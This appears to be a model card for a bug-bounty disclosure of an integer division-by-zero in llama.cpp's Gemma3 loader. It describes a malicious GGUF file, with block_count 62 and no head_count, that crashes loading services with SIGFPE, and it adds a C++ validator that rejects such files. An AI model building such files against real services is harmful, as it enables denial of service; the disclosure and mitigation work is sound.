Use from the llama-cpp-python library

# !pip install llama-cpp-python
# Loading this GGUF through a vulnerable llama.cpp build reproduces the crash
# described below: on x86_64 the process dies with SIGFPE inside the gemma3
# loader, before any token is generated.

from llama_cpp import Llama

llm = Llama.from_pretrained(
    repo_id="salvepilo/llama-cpp-gemma3-divzero-poc",
    filename="poc_gemma3_divzero.gguf",
)
output = llm(
    "Once upon a time,",
    max_tokens=512,
    echo=True
)
print(output)

llama.cpp Gemma3 Integer Division-by-Zero PoC

Proof-of-concept for an integer division-by-zero vulnerability in llama.cpp's Gemma3 architecture loader. Loading the file crashes the process at model-load time (SIGFPE on x86_64), so any service that loads untrusted GGUF files is exposed to a denial of service.

Vulnerable file: src/models/gemma3.cpp:32

Files

  • poc_gemma3_divzero.gguf - 235-byte malicious GGUF (no tensors, triggers SIGFPE on x86_64)
  • reproducer.cpp - standalone C++ reproducer (no llama.cpp build needed)

Quick test

# Standalone (no llama.cpp needed)
g++ -o reproducer reproducer.cpp -fsanitize=undefined -fno-sanitize-recover=all
./reproducer
# Expected: runtime error: division by zero

# With llama.cpp
./llama-cli -m poc_gemma3_divzero.gguf -p 'hello'
# Expected on x86_64: Floating point exception (exit 136)

Root cause

When gemma3.block_count is 62 (which the loader maps to LLM_TYPE_27B) and gemma3.attention.head_count is absent from the GGUF, the per-layer head count keeps its default of 0, so n_head(0) returns 0 and the expression n_embd / n_head(0) at src/models/gemma3.cpp:32 is an integer division by zero. On x86_64 the CPU raises #DE and the process is killed with SIGFPE (exit status 136); on AArch64 integer division by zero returns 0 without trapping, so the crash does not reproduce there, although the resulting zero head dimension is still wrong. With -fsanitize=undefined -fno-sanitize-recover=all the reproducer aborts at the same expression on any architecture.
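The check the loader is missing, as an added example that is not code from this PoC repository or from llama.cpp: a minimal bounds-checked GGUF metadata reader followed by a pre-load validation that mirrors the n_embd / n_head(0) derivation from the Root cause section but refuses the file when attention.head_count is absent or zero. The GGUF image is constructed in build_gguf() (a tensor-less gemma3 file with block_count=62, the same shape as the PoC in the Files section, but with constructed embedding_length and head_count values, not the 235-byte PoC file itself); the key names and type ids follow the GGUF specification, and a little-endian host is assumed.

```cpp
// Added example: GGUF metadata reader + pre-load head-count check.
// Not part of the PoC repository or of llama.cpp.
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <map>
#include <stdexcept>
#include <string>
#include <vector>

// GGUF value type ids (numbering per the GGUF specification / gguf.h).
enum GgufType : uint32_t {
    GGUF_U8 = 0, GGUF_I8 = 1, GGUF_U16 = 2, GGUF_I16 = 3, GGUF_U32 = 4, GGUF_I32 = 5,
    GGUF_F32 = 6, GGUF_BOOL = 7, GGUF_STRING = 8, GGUF_ARRAY = 9, GGUF_U64 = 10,
    GGUF_I64 = 11, GGUF_F64 = 12
};

struct GgufValue {
    GgufType type = GGUF_U8;
    std::vector<uint64_t> ints;  // integer/bool scalar (one entry) or integer array
    std::string str;             // GGUF_STRING (strings inside arrays are dropped)
};

// Bounds-checked little-endian cursor over an in-memory GGUF image.
class Cursor {
    const std::vector<uint8_t>& buf;
    size_t pos = 0;
public:
    explicit Cursor(const std::vector<uint8_t>& b) : buf(b) {}
    void need(uint64_t n) { if (n > buf.size() - pos) throw std::runtime_error("truncated GGUF"); }
    template <typename T> T read() { need(sizeof(T)); T v; std::memcpy(&v, &buf[pos], sizeof(T)); pos += sizeof(T); return v; }
    std::string read_str() { uint64_t n = read<uint64_t>(); need(n); std::string s(buf.begin() + pos, buf.begin() + pos + n); pos += n; return s; }
    void skip(uint64_t n) { need(n); pos += n; }
};

static GgufValue read_value(Cursor& c, GgufType t, int depth = 0) {
    GgufValue v; v.type = t;
    switch (t) {
        case GGUF_U8:   v.ints.push_back(c.read<uint8_t>()); break;
        case GGUF_I8:   v.ints.push_back((uint64_t)c.read<int8_t>()); break;
        case GGUF_U16:  v.ints.push_back(c.read<uint16_t>()); break;
        case GGUF_I16:  v.ints.push_back((uint64_t)c.read<int16_t>()); break;
        case GGUF_U32:  v.ints.push_back(c.read<uint32_t>()); break;
        case GGUF_I32:  v.ints.push_back((uint64_t)c.read<int32_t>()); break;
        case GGUF_BOOL: v.ints.push_back(c.read<uint8_t>()); break;
        case GGUF_U64:  v.ints.push_back(c.read<uint64_t>()); break;
        case GGUF_I64:  v.ints.push_back((uint64_t)c.read<int64_t>()); break;
        case GGUF_F32:  c.skip(4); break;  // floats play no part in the head-count check
        case GGUF_F64:  c.skip(8); break;
        case GGUF_STRING: v.str = c.read_str(); break;
        case GGUF_ARRAY: {
            if (depth > 0) throw std::runtime_error("nested GGUF arrays not supported here");
            GgufType et = (GgufType)c.read<uint32_t>();
            uint64_t n = c.read<uint64_t>();
            for (uint64_t i = 0; i < n; i++) {   // a bogus count runs into need() and throws
                GgufValue e = read_value(c, et, depth + 1);
                v.ints.insert(v.ints.end(), e.ints.begin(), e.ints.end());
            }
            break;
        }
        default: throw std::runtime_error("unknown GGUF value type");
    }
    return v;
}

using Metadata = std::map<std::string, GgufValue>;

// Parses magic, version and the KV block; tensor infos are not needed here.
static Metadata parse_gguf(const std::vector<uint8_t>& image) {
    Cursor c(image);
    if (c.read<uint32_t>() != 0x46554747u) throw std::runtime_error("bad magic (expected \"GGUF\")");
    uint32_t version = c.read<uint32_t>();
    if (version != 2 && version != 3) throw std::runtime_error("unsupported GGUF version");
    (void)c.read<uint64_t>();               // tensor count
    uint64_t n_kv = c.read<uint64_t>();
    Metadata md;
    for (uint64_t i = 0; i < n_kv; i++) {   // every read is bounds-checked, so a huge n_kv just throws
        std::string key = c.read_str();
        GgufType t = (GgufType)c.read<uint32_t>();
        md[key] = read_value(c, t);
    }
    return md;
}

// Mirrors the loader's n_embd_head = n_embd / n_head(0), where n_head(0) is the
// first (or only) entry of <arch>.attention.head_count, but never divides by zero.
static bool check_head_dims(const Metadata& md, uint64_t& n_embd_head, std::string& reason) {
    auto a = md.find("general.architecture");
    if (a == md.end() || a->second.type != GGUF_STRING) { reason = "missing general.architecture"; return false; }
    const std::string arch = a->second.str;
    auto first_int = [&](const std::string& suffix, uint64_t& out) {
        auto it = md.find(arch + "." + suffix);
        if (it == md.end() || it->second.ints.empty()) return false;
        out = it->second.ints[0];
        return true;
    };
    uint64_t n_embd = 0, n_head = 0;
    if (!first_int("embedding_length", n_embd)) { reason = "missing " + arch + ".embedding_length"; return false; }
    if (!first_int("attention.head_count", n_head)) { reason = "missing " + arch + ".attention.head_count"; return false; }  // the PoC case
    if (n_head == 0 || n_embd == 0) { reason = "head_count or embedding_length is zero"; return false; }
    if (n_embd % n_head != 0) { reason = "embedding_length is not a multiple of head_count"; return false; }
    n_embd_head = n_embd / n_head;   // only reached with a non-zero divisor
    return true;
}

// Constructed input: tensor-less gemma3 GGUF, block_count=62, head_count optional.
struct Builder {
    std::vector<uint8_t> out;
    template <typename T> void put(T v) { const uint8_t* p = reinterpret_cast<const uint8_t*>(&v); out.insert(out.end(), p, p + sizeof(T)); }
    void put_str(const std::string& s) { put<uint64_t>(s.size()); out.insert(out.end(), s.begin(), s.end()); }
    void kv_str(const std::string& k, const std::string& v) { put_str(k); put<uint32_t>(GGUF_STRING); put_str(v); }
    void kv_u32(const std::string& k, uint32_t v) { put_str(k); put<uint32_t>(GGUF_U32); put<uint32_t>(v); }
};

static std::vector<uint8_t> build_gguf(bool with_head_count) {
    Builder b;
    b.put<uint32_t>(0x46554747u);               // "GGUF"
    b.put<uint32_t>(3);                         // version
    b.put<uint64_t>(0);                         // no tensors
    b.put<uint64_t>(with_head_count ? 4 : 3);   // KV count
    b.kv_str("general.architecture", "gemma3");
    b.kv_u32("gemma3.block_count", 62);         // maps to LLM_TYPE_27B in the loader
    b.kv_u32("gemma3.embedding_length", 4096);  // constructed value, not Gemma3's real width
    if (with_head_count) b.kv_u32("gemma3.attention.head_count", 32);  // constructed value
    return b.out;
}

static void report(bool with_head_count) {
    uint64_t head_dim = 0; std::string why;
    if (check_head_dims(parse_gguf(build_gguf(with_head_count)), head_dim, why))
        std::printf("accept: n_embd_head=%llu\n", (unsigned long long)head_dim);
    else
        std::printf("reject: %s\n", why.c_str());
}

int main() {
    report(false);   // PoC shape: rejected before any division
    report(true);    // well-formed: accepted, head dim 128
    return 0;
}
```

The reject path is the one the loader lacks: the decision is made from the parsed metadata before n_embd / n_head(0) is ever evaluated, so the same input that kills llama-cli with SIGFPE is turned into an ordinary load error. Wiring a check like this in front of whatever service accepts uploaded GGUF files is the cheapest mitigation while waiting for a fixed llama.cpp build.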

Reported via Huntr bug bounty program.
